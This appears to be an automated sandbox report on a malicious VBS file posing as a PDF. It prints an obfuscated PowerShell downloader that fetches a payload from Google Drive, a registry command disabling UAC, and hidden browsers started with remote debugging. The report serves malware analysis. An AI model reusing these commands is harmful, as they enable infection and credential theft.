PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 4064 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 5112 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 5112 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 2908 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 2908 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 2908 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 5044 wrote to memory of 2908 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\11315781264·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Undiscriminatingness Vodun Hervards Folkefrontsregeringen Carmakers #><#Polyhedrons Versionsnavnenes Baalets Quadrennially Catarines Recondite #>$Disleaf100='Mrtel';function Moderates7($Trdestens){If ($host.DebuggerEnabled) {$Flood++;$effectualnesses=$Trdestens.'Length' - $Flood} for ( $Foelelsen=4;$Foelelsen -lt $effectualnesses;$Foelelsen+=5){$Brillanters151=$Foelelsen;$Sippingly+=$Trdestens[$Foelelsen]}$Sippingly}function forsrgelseskommunernes($Primrfilers){ .($Modkandidaten) ($Primrfilers)}$Lossen=Moderates7 'Forgn KnoeGe,vtBist.Jeh w Vs.EEndybUnsecAlkol,eroIAspieSandn Re.Tco n ';$Splanchnopleure=Moderates7 'Kl.tM iaoK.gezTugti ClelFormlPrewaBac /Redi ';$flintres=Moderates7 ' sogTOrgalSupesColp1Unus2 ryn ';$Kliniskes='Mail[Rac,NGluce SquTOmsi.StresParneBasiR L mv kerIHe,sC Ko etwelPUnesOCe tiR giNPolyT amuMa,baASashng teAGenfG AirEAngrr ent]B ug: Ryk:,eenSDogseMar,cBet.U olsROm yI rigTPyrrYFl.nPclavr Couo FortMedio beecCharoSp oL ,ev=stud$OpspfBioglTummi ormN Sn.TParlrUlykeOf dSMoze ';$Splanchnopleure+=Moderates7 ' aje5Cas .fors0Skar T sk( imiW,okuiOrddnDo.adsteroAy twF,apsNu z V,nNchroTErob rot 1Cens0Type.Prod0Hove;Te r SensW nci Keln B.a6 Rec4Fakt;Dile MichxUdfo6Gyld4Klor;Exhu UnmrRentvtext: es1 Ill3Eret1aper.None0Reve) Ant Cu.GProgeP rocpalikRn,eo Hai/ .ap2,ede0 Ful1E,in0 Bu 0cata1Ud,l0,ovn1Li.p RevoFP.ntiSalgrTurbeSl gfakt o A txf ls/ Pec1N vl3De.e1Len .Nic 0Dipl ';$Umodenhedens246=Moderates7 'Ss.euLuneSMultEA roRComi-DkssAPadagSymmEPl tNSolltSted ';$Tallit=Moderates7 'R.buhPondtGud tThurpImpusAfse:Chid/anas/kr,pdDobbrTruci Cr,v Plue eng.Uds,gTayioTradoel kgImmalS.gne ush.Leibc SkroBorrmAn i/SquauBru,c.ors?PerreI loxNonspPreso Omsr ventQuod=PluvdSulpo BlewDiscnarenlNeuro Disa MoldImpr&Ph,sibungd kor=Karr1Siph1kejs6EsopG tepeBortVKlipSBeelxO tjaforu7StarC tifmMelo0 .esvFlorf M,lwMu.r2 Up zOve t EnapT,fnBEquimsaggqTa aL Bie8DialUVariy Me,A,orsNPancdC muA ap_Topao eal ';$Udfrselsforbuddets=Moderates7 'Quar>,yan ';$Modkandidaten=Moderates7 ' MidiGua EFes xDo e ';$Par='Problemfrit';$Skridfastes='\Banebryderes.Non';forsrgelseskommunernes (Moderates7 '.den$F kagLogalPagiOTem bF,miA arLP,is: Faxe C,nsRej rBeg o CurgS,egsEndo= ymn$Mas eKnleNCracV Cli:Le.saSkaaP Medp irsdN.npA Inft ho aBism+T mm$TranSWaivKMlkeREkspIRecrdUdprFOverARi oSUdbyT soEGropsFil ');forsrgelseskommunernes (Moderates7 'Andr$SeveGSkurlMks.O nsBFordAA baLCe.s:TidsCs enrPersoSammTKli aPirqp rimhEnthI Gauo RednBrnd=Efte$FisstTrinAVeinLE taLProtiHereT Per.DobbSS,eaP atal C,eIHypoTFras(Til.$U inuUnmuD ameF uborUvejSUroceHalel MooSDsleFPar,OH.ikRtopfbBogpu heDRaadD FriELapaT orss Dat)S,ot ');forsrgelseskommunernes (Moderates7 $Kliniskes);$Tallit=$Crotaphion[0];$Mytologiers=(Moderates7 'Preg$FodngIndklBlodoOpd,B alaDesslWarm:di essvmmITeleLKarrjRe mAHankSPort=CellNSkrieFadeW K,i-,lado D bB ArbJAsice CatCd,rmTHngt .ncrSVareyReacs E stUskaenutiMM lo. Art$ TriLFatto zygsGlauSpatcE ropnOv r ');forsrgelseskommunernes ($Mytologiers);forsrgelseskommunernes (Moderates7 'halv$UnfoSForriWooll refjKajaaA unsLigh.Cou.H ngeeVandaOu.tdT lbe afrr,allsdest[,epa$,ntaUI,gem TjroHidsdLarmeCycanAfbrhUvaneRoerd Do eFa.tnA,tisUsmm2 Fal4Resr6 Fe,] Eng=Bear$SkadS KetpAutolR,baa RepnTro csarahEpocn,agso wepOrdelskileAno upla r ndeFdre ');$Rumpadder=Moderates7 'Radi$SessSbi ti S,nlU etjfro a OopsUdfr.Unw DR ugoAutow azan koblscraoSpidaMaa dJarvFPoesiS bslTaveePros(Soci$,ourTForea Fril R nlThioi SubtRefu,To p$EutyV alvaBasnmSupesUrok)Goat ';$Vams=$Esrogs;forsrgelseskommunernes (Moderates7 'Flas$Photg,ontlAlimoDanuBHonnaZ ielLa d:SkrapInp R StrIOystoVo,eR BrniIgant.eriemazaT Ales udsRStryk Pyck ase draf NaiLVindG.ncoeUnde=C ma(DesatLi rE RedsEksptDege-F empCirkamangtVernhLekt Busf$skriVSladaPeccM.ortsMeso)Tils ');while (!$Prioritetsrkkeflge) {forsrgelseskommunernes (Moderates7 'Reri$TaargBanelMi toindpb F mareselTerm:YusdMMoraaFinapKlerpC.pteBillrEcho=Post$BrnetEmmer.lagu Drie rei ') ;forsrgelseskommunernes $Rumpadder;forsrgelseskommunernes (Moderates7 'BromsRespTVelsaTierRSta tStre- MovSInteLArcheKuldeundfp.qui Gran4Disa ');forsrgelseskommunernes (Moderates7 'Numm$UnreG AsmLOutsoM ltb lumA.ellL.ale: A sPLiftrOrnai irco ThaR,mbriFerrTSha eMeddtNonlsobskRF euKAn rKHandEKol,f IntL P.pg.ynfe,rab=Pist(Hus,tsys.e mansStjkTEksp- alpNataAOptoTModeHTord Anf$SupeV.ndka AntMOvers Jv.)Pann ') ;forsrgelseskommunernes (Moderates7 'sw n$SexgGAposLLideOEl ebunpeANonsLSita:MispR DrueSalvPTil EInderPhotKSe i= Lud$GromgG rnlElatO TriBTheoaMillL Exu:P ela Hetu allGUkbuUjoggSLizetAssuSAcetNCha D iera Ma,gBnkh+ko p+Tere%Pree$ lsdC FhorIsomoPerit BreaForeP GreHKoloiMicro lgtNGasa.Ret C ropoPounuMalmnAlumtNons ') ;$Tallit=$Crotaphion[$Reperk]}$poncho=321965;$Yawn=30428;forsrgelseskommunernes (Moderates7 'Elfo$Stefg UnbLCiliO C eBverdA DatLmela:PlejNAffueEnemPiridHhrecrIrr e DefCinditRoduAForeSSneaIEvapa Ye Chac=Proe BakuGS,iceTvist dr-meascBassORa iN.leuT Ture Tann JerTnrin yd r$S.ndVStruA yrmS.lss us ');forsrgelseskommunernes (Moderates7 'Udeb$ForbgCheel.enaoBirrbFor a.bdulHvil:DokuEMulmx KamsFolkeChokrRevitReunsHjfo Con =Bekl Ha.i[ InjSApriySirpsS lhtIndde Form Akk.BippC OveoFljdnarguvCu ue.nuer ToptMisp] Sot:Serv:BaadFKenirShunoIn emG,veB,eroaPasssAn.meCann6 len4InanSA oxtArcurGi tiOutlnAfragU de( Att$OogeNfugueVanlpUns,hRonirAn.ueAp rcRaditElekaTusksSpitiForvabegr)Bane ');forsrgelseskommunernes (Moderates7 'Vaga$ onGProclParaOUre BSilvaVestlPapi: S.rsDe omO,snAInamaZ naFK,nseInefj,ugsLMerssDoor Camo= Mon Str[Fa,ssRtehyEkspsDelttrecieFladMForb.ArbeTBezoE,vigX VdeT Chi.BeefECinnN roccBeskoFormd,rumiIn oNL anGBu l]Pare:bygn:MongA P fsPyraCOpbliCin.IBema.Ome gHinge GenT UdvsHumrtInfarVil ITilhNUsliGF,tt(Macr$D,ueE Lo xPhocs leENonerar.et.eleSMell)Afs ');forsrgelseskommunernes (Moderates7 'Rusl$syl GDerfl aphOQuasbB.spABundlF it:Te.bot ktP KomPBeleIGr,yGJapaN ImpoLemaRsid a V.dT,oveESpio=Me e$FabrsAbelmHyd AR dhAStilf Ov eF,reJSyndL finS T v.PaspSSkyhusig BRecosTlpetBl dRc uniSangn NonG Cha(Lill$trosPR.maOStyln.ericO,sth,nfrO al.,Geog$Skn.YTvrfaRuggwNewsnToha) onc ');forsrgelseskommunernes $Oppignorate;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Undiscriminatingness Vodun Hervards Folkefrontsregeringen Carmakers #><#Polyhedrons Versionsnavnenes Baalets Quadrennially Catarines Recondite #>$Disleaf100='Mrtel';function Moderates7($Trdestens){If ($host.DebuggerEnabled) {$Flood++;$effectualnesses=$Trdestens.'Length' - $Flood} for ( $Foelelsen=4;$Foelelsen -lt $effectualnesses;$Foelelsen+=5){$Brillanters151=$Foelelsen;$Sippingly+=$Trdestens[$Foelelsen]}$Sippingly}function forsrgelseskommunernes($Primrfilers){ .($Modkandidaten) ($Primrfilers)}$Lossen=Moderates7 'Forgn KnoeGe,vtBist.Jeh w Vs.EEndybUnsecAlkol,eroIAspieSandn Re.Tco n ';$Splanchnopleure=Moderates7 'Kl.tM iaoK.gezTugti ClelFormlPrewaBac /Redi ';$flintres=Moderates7 ' sogTOrgalSupesColp1Unus2 ryn ';$Kliniskes='Mail[Rac,NGluce SquTOmsi.StresParneBasiR L mv kerIHe,sC Ko etwelPUnesOCe tiR giNPolyT amuMa,baASashng teAGenfG AirEAngrr ent]B ug: Ryk:,eenSDogseMar,cBet.U olsROm yI rigTPyrrYFl.nPclavr Couo FortMedio beecCharoSp oL ,ev=stud$OpspfBioglTummi ormN Sn.TParlrUlykeOf dSMoze ';$Splanchnopleure+=Moderates7 ' aje5Cas .fors0Skar T sk( imiW,okuiOrddnDo.adsteroAy twF,apsNu z V,nNchroTErob rot 1Cens0Type.Prod0Hove;Te r SensW nci Keln B.a6 Rec4Fakt;Dile MichxUdfo6Gyld4Klor;Exhu UnmrRentvtext: es1 Ill3Eret1aper.None0Reve) Ant Cu.GProgeP rocpalikRn,eo Hai/ .ap2,ede0 Ful1E,in0 Bu 0cata1Ud,l0,ovn1Li.p RevoFP.ntiSalgrTurbeSl gfakt o A txf ls/ Pec1N vl3De.e1Len .Nic 0Dipl ';$Umodenhedens246=Moderates7 'Ss.euLuneSMultEA roRComi-DkssAPadagSymmEPl tNSolltSted ';$Tallit=Moderates7 'R.buhPondtGud tThurpImpusAfse:Chid/anas/kr,pdDobbrTruci Cr,v Plue eng.Uds,gTayioTradoel kgImmalS.gne ush.Leibc SkroBorrmAn i/SquauBru,c.ors?PerreI loxNonspPreso Omsr ventQuod=PluvdSulpo BlewDiscnarenlNeuro Disa MoldImpr&Ph,sibungd kor=Karr1Siph1kejs6EsopG tepeBortVKlipSBeelxO tjaforu7StarC tifmMelo0 .esvFlorf M,lwMu.r2 Up zOve t EnapT,fnBEquimsaggqTa aL Bie8DialUVariy Me,A,orsNPancdC muA ap_Topao eal ';$Udfrselsforbuddets=Moderates7 'Quar>,yan ';$Modkandidaten=Moderates7 ' MidiGua EFes xDo e ';$Par='Problemfrit';$Skridfastes='\Banebryderes.Non';forsrgelseskommunernes (Moderates7 '.den$F kagLogalPagiOTem bF,miA arLP,is: Faxe C,nsRej rBeg o CurgS,egsEndo= ymn$Mas eKnleNCracV Cli:Le.saSkaaP Medp irsdN.npA Inft ho aBism+T mm$TranSWaivKMlkeREkspIRecrdUdprFOverARi oSUdbyT soEGropsFil ');forsrgelseskommunernes (Moderates7 'Andr$SeveGSkurlMks.O nsBFordAA baLCe.s:TidsCs enrPersoSammTKli aPirqp rimhEnthI Gauo RednBrnd=Efte$FisstTrinAVeinLE taLProtiHereT Per.DobbSS,eaP atal C,eIHypoTFras(Til.$U inuUnmuD ameF uborUvejSUroceHalel MooSDsleFPar,OH.ikRtopfbBogpu heDRaadD FriELapaT orss Dat)S,ot ');forsrgelseskommunernes (Moderates7 $Kliniskes);$Tallit=$Crotaphion[0];$Mytologiers=(Moderates7 'Preg$FodngIndklBlodoOpd,B alaDesslWarm:di essvmmITeleLKarrjRe mAHankSPort=CellNSkrieFadeW K,i-,lado D bB ArbJAsice CatCd,rmTHngt .ncrSVareyReacs E stUskaenutiMM lo. Art$ TriLFatto zygsGlauSpatcE ropnOv r ');forsrgelseskommunernes ($Mytologiers);forsrgelseskommunernes (Moderates7 'halv$UnfoSForriWooll refjKajaaA unsLigh.Cou.H ngeeVandaOu.tdT lbe afrr,allsdest[,epa$,ntaUI,gem TjroHidsdLarmeCycanAfbrhUvaneRoerd Do eFa.tnA,tisUsmm2 Fal4Resr6 Fe,] Eng=Bear$SkadS KetpAutolR,baa RepnTro csarahEpocn,agso wepOrdelskileAno upla r ndeFdre ');$Rumpadder=Moderates7 'Radi$SessSbi ti S,nlU etjfro a OopsUdfr.Unw DR ugoAutow azan koblscraoSpidaMaa dJarvFPoesiS bslTaveePros(Soci$,ourTForea Fril R nlThioi SubtRefu,To p$EutyV alvaBasnmSupesUrok)Goat ';$Vams=$Esrogs;forsrgelseskommunernes (Moderates7 'Flas$Photg,ontlAlimoDanuBHonnaZ ielLa d:SkrapInp R StrIOystoVo,eR BrniIgant.eriemazaT Ales udsRStryk Pyck ase draf NaiLVindG.ncoeUnde=C ma(DesatLi rE RedsEksptDege-F empCirkamangtVernhLekt Busf$skriVSladaPeccM.ortsMeso)Tils ');while (!$Prioritetsrkkeflge) {forsrgelseskommunernes (Moderates7 'Reri$TaargBanelMi toindpb F mareselTerm:YusdMMoraaFinapKlerpC.pteBillrEcho=Post$BrnetEmmer.lagu Drie rei ') ;forsrgelseskommunernes $Rumpadder;forsrgelseskommunernes (Moderates7 'BromsRespTVelsaTierRSta tStre- MovSInteLArcheKuldeundfp.qui Gran4Disa ');forsrgelseskommunernes (Moderates7 'Numm$UnreG AsmLOutsoM ltb lumA.ellL.ale: A sPLiftrOrnai irco ThaR,mbriFerrTSha eMeddtNonlsobskRF euKAn rKHandEKol,f IntL P.pg.ynfe,rab=Pist(Hus,tsys.e mansStjkTEksp- alpNataAOptoTModeHTord Anf$SupeV.ndka AntMOvers Jv.)Pann ') ;forsrgelseskommunernes (Moderates7 'sw n$SexgGAposLLideOEl ebunpeANonsLSita:MispR DrueSalvPTil EInderPhotKSe i= Lud$GromgG rnlElatO TriBTheoaMillL Exu:P ela Hetu allGUkbuUjoggSLizetAssuSAcetNCha D iera Ma,gBnkh+ko p+Tere%Pree$ lsdC FhorIsomoPerit BreaForeP GreHKoloiMicro lgtNGasa.Ret C ropoPounuMalmnAlumtNons ') ;$Tallit=$Crotaphion[$Reperk]}$poncho=321965;$Yawn=30428;forsrgelseskommunernes (Moderates7 'Elfo$Stefg UnbLCiliO C eBverdA DatLmela:PlejNAffueEnemPiridHhrecrIrr e DefCinditRoduAForeSSneaIEvapa Ye Chac=Proe BakuGS,iceTvist dr-meascBassORa iN.leuT Ture Tann JerTnrin yd r$S.ndVStruA yrmS.lss us ');forsrgelseskommunernes (Moderates7 'Udeb$ForbgCheel.enaoBirrbFor a.bdulHvil:DokuEMulmx KamsFolkeChokrRevitReunsHjfo Con =Bekl Ha.i[ InjSApriySirpsS lhtIndde Form Akk.BippC OveoFljdnarguvCu ue.nuer ToptMisp] Sot:Serv:BaadFKenirShunoIn emG,veB,eroaPasssAn.meCann6 len4InanSA oxtArcurGi tiOutlnAfragU de( Att$OogeNfugueVanlpUns,hRonirAn.ueAp rcRaditElekaTusksSpitiForvabegr)Bane ');forsrgelseskommunernes (Moderates7 'Vaga$ onGProclParaOUre BSilvaVestlPapi: S.rsDe omO,snAInamaZ naFK,nseInefj,ugsLMerssDoor Camo= Mon Str[Fa,ssRtehyEkspsDelttrecieFladMForb.ArbeTBezoE,vigX VdeT Chi.BeefECinnN roccBeskoFormd,rumiIn oNL anGBu l]Pare:bygn:MongA P fsPyraCOpbliCin.IBema.Ome gHinge GenT UdvsHumrtInfarVil ITilhNUsliGF,tt(Macr$D,ueE Lo xPhocs leENonerar.et.eleSMell)Afs ');forsrgelseskommunernes (Moderates7 'Rusl$syl GDerfl aphOQuasbB.spABundlF it:Te.bot ktP KomPBeleIGr,yGJapaN ImpoLemaRsid a V.dT,oveESpio=Me e$FabrsAbelmHyd AR dhAStilf Ov eF,reJSyndL finS T v.PaspSSkyhusig BRecosTlpetBl dRc uniSangn NonG Cha(Lill$trosPR.maOStyln.ericO,sth,nfrO al.,Geog$Skn.YTvrfaRuggwNewsnToha) onc ');forsrgelseskommunernes $Oppignorate;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files\Google\Chrome\Application\Chrome.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffbc48dcc40,0x7ffbc48dcc4c,0x7ffbc48dcc58

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\kixczjcbocvxxdmpnxcxrzydbqhqc"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\uccnzcnucknkhjatwapruetujxzzvtrds"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\xfqga"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1968,i,16732211798698630664,13001517311597031765,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1964 /prefetch:2

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2160,i,16732211798698630664,13001517311597031765,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2180 /prefetch:3

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2260,i,16732211798698630664,13001517311597031765,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2276 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,16732211798698630664,13001517311597031765,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3188 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,16732211798698630664,13001517311597031765,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3264 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4356,i,16732211798698630664,13001517311597031765,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4372 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4772,i,16732211798698630664,13001517311597031765,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4800 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4828,i,16732211798698630664,13001517311597031765,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4928 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffbc47946f8,0x7ffbc4794708,0x7ffbc4794718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,11850875929599068140,10281565896473995305,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,11850875929599068140,10281565896473995305,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,11850875929599068140,10281565896473995305,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2184,11850875929599068140,10281565896473995305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2184,11850875929599068140,10281565896473995305,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2184,11850875929599068140,10281565896473995305,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2184,11850875929599068140,10281565896473995305,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
